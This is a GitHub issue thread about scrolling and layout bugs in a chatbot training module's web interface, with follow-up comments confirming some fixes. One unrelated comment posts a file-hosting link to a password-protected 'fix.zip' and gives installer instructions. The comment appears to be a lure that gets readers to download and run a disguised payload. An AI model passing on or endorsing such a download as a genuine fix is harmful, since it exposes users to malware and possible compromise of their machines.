### ISSUE TITLE
Training Module UI Improvements

### ISSUE THREAD

**Issue by ffrose** [buerokratt/Training-Module#641]
[BUG]

Intents in /training/training/intents should be inside of a scroll list. As of right now, i have to scroll the whole page to go down.

https://github.com/user-attachments/assets/2f910d3f-ecf2-44b3-b8dc-b858edd8327b

In rules /training/training/stories i am able to scroll rules as well as the whole page. I should be able to only use the rules scroll list.

https://github.com/user-attachments/assets/c6545eb7-a762-4e5b-ba6a-e290c2067204

Probable cause:
![Image](https://github.com/user-attachments/assets/198efc39-a293-4718-96f2-a2a4ed4564f3)

In //training/history/history "View/Vaata" Button is not fixed on the right side of the page, to see the button you must scroll to the right. It should match the configuration as it is in /chat/history.

https://github.com/user-attachments/assets/a66f402f-57cb-4af1-82e2-dea78b1366a9

In /chat/users you should be able to only scroll the users list, not the whole page.

![Image](https://github.com/user-attachments/assets/1e627a1f-ffa0-4708-94e6-1fc87e70bfc4)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ffrose** [comment]
Able to scroll whole page in training/training/intents and in training/training/stories
Should be able to scroll only intents and examples in training/training/intents
&
Should be able to scroll only the list of rules in training/training/stories.

Vaata button is fixed.
/chat/users view is fixed.

**Comment by jaX10bt** [comment]
[BUG] - table cards in chatbot module (/chat/history and /chat/users) do not have vertical scrolling functionality, so cards can extend beyond the window and the content can not be reached by scrolling.

https://github.com/user-attachments/assets/f22ce386-72a9-4fae-ae9d-5f43c3d627aa

**Comment by jaX10bt** [comment]
Works as intended
